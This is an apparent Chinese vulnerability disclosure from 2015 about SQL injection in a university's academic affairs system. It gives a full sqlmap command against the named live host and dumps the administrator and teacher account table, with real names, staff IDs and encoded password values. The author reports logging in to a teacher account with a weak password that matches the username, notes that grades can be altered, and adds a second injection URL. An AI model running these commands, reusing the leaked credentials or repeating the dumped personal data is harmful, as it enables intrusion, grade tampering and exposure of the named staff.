2015-05-20: 细节已通知厂商并且等待厂商处理中 2015-05-25: 厂商已经主动忽略漏洞,细节向公众公开
似乎是开放了多余的功能,并没有在使用这套系统的其他学校找到这个漏洞文件
sqlmap -u "http://bkjw.jsnu.edu.cn/other/findmm.aspx" --data "__VIEWSTATE=%2FwEPDwUKMTM3MDMyNTgxMQ9kFgICAw9kFgICCQ8PFgIeBFRleHRlZGRkDT0lfg003PEJouDc7Ib%2FVQuuzVE%3D&__EVENTVALIDATION=%2FwEWBgLj84i4CQLor%2FPuDAL3r%2FPuDAKBmOPQBQKcgYHmDwKM54rGBsV344zSHNaXohGFz7uP0KRd%2FDWW&ddllx=1&tb1=110&tb2=110&Button1=+%D5%D2+%BB%D8+" -p "tb1" --dbs
既然是教务系统那么学生资料肯定是会有的,这里只跑了一下管理员表
USER_ID,USER_CREATOR_ID,USER_MODIFIER_ID,ISKYX,YXKZLX,EJSQBZ,KCZYXDM,PAGESIZE,KCZJYSDM,USER_EMAIL,USER_ENABLE,USER_PASSWD,USER_ACCOUNT,USER_END_TIME,USER_REAL_NAME,USER_PWD_EMAIL,USER_START_TIME,USER_MODIFY_TIME,USER_PWD_ANSWER2,USER_PWD_ANSWER1,USER_CREATE_TIME,USER_ACCOUNT_TYPE,USER_PWD_QUESTION2,USER_PWD_QUESTION1,USER_LAST_LOGIN_TIME,USER_LAST_LOGIN_DATE16,NULL,1796,1,NULL,NULL,NULL,500,NULL,<blank>,1,uWOw9EUfPPsB4ckWqKb71A==,admin,NULL,系统管理员,<blank>,NULL,12 \\?a0\\?39 2009 \\?a0\\?32:40PM,<blank>,<blank>,NULL,super,<blank>,<blank>,10:19:8,2015/5/81860,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,836qibcz/UTsQ7IbmLbrhg==,182089,NULL,张成福,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,16:59:23,2015/3/11861,NULL,NULL,NULL,NULL,NULL,NULL,60,NULL,NULL,1,dErAJs7Nrz9PtVh458/ltA==,185091,NULL,蒋岱,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,11:20:30,2015/4/131862,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,ku7/rlEqP04aNroWdJSsjQ==,186025,NULL,鲁斌宏,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,23:37:34,2013-6-301863,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,QbpmzuwIiEkReo3e61Pkxg==,189086,NULL,杜文霞,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,13:6:44,2015/1/221864,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,yllV1tqqQokvGWzAIdZ0xQ==,189100,NULL,周建萍,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,14:11:39,2015/3/241865,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,ZMTsdt9OhNWasGT8K28Qrw==,189159,NULL,李申,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,9:24:58,2010-6-71866,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,PEiGR+1YnIgU031T6WNd9w==,189187,NULL,朱存明,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,NULL,NULL1867,NULL,NULL,NULL,NULL,NULL,NULL,15,NULL,NULL,1,UQkSdzK9f2x1esNSWqMoZQ==,189275,NULL,于为苍,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,18:38:55,2015/1/241868,NULL,NULL,NULL,NULL,NULL,NULL,15,NULL,NULL,1,r6EkJ0R/l68IEhDMTsbMEA==,190007,NULL,张卫中,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,10:39:48,2014/12/231869,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,uSK6AUZZP4mMhAdIjsol+A==,192058,NULL,乔秋颖,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,23:37:37,2015/5/71879,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,FX51bYJGw6PCjvyV65U2gw==,01012,NULL,胡伟,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,NULL,NULL1880,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,OYGNhuaWetGsC67IUdxNJQ==,01013,NULL,邓星雨,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,17:23:29,2011-6-221881,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,HBumjSpsCFCsQJR2LC3ANg==,195009,NULL,叶正渤,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,15:12:5,2015/1/161882,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,xC3xaNQZKbcUFkvoM1b6Ig==,195015,NULL,张文德,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,13:25:35,2015/3/111883,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,phZCG+myP2p/qhRMBflY7Q==,195032,NULL,沈玲,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,15:18:59,2012-11-91884,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,wPEiotbz39aUjToPag/y3Q==,195033,NULL,田崇雪,NULL,NULL,NULL,NULL,NULL,NULL,teacher,NULL,NULL,10:37:7,2014-1-17
密码没解出来随手打个弱口令进去了182089/182089
这里可以改成绩,但是教师权限很小 似乎只能改自己教的科目
就到这里吧,顺便附赠一个这个系统的通用注入,需要学生帐号登录。
http://url/JWXS/xsxk/xsxk_zlgl_jstd.aspx?Zj=201420001489&TzdId=201420001489&kcmc=%cf%df%d0%d4%b4%fa%ca%fd&xnxqh=2014-2015-2&kcdm=00250&actionSrc=
参数xnxqh报错注入,然而并没有什么软用
同上
完全不明白
危害等级:无影响厂商忽略
忽略时间:2015-05-25 18:24
暂无
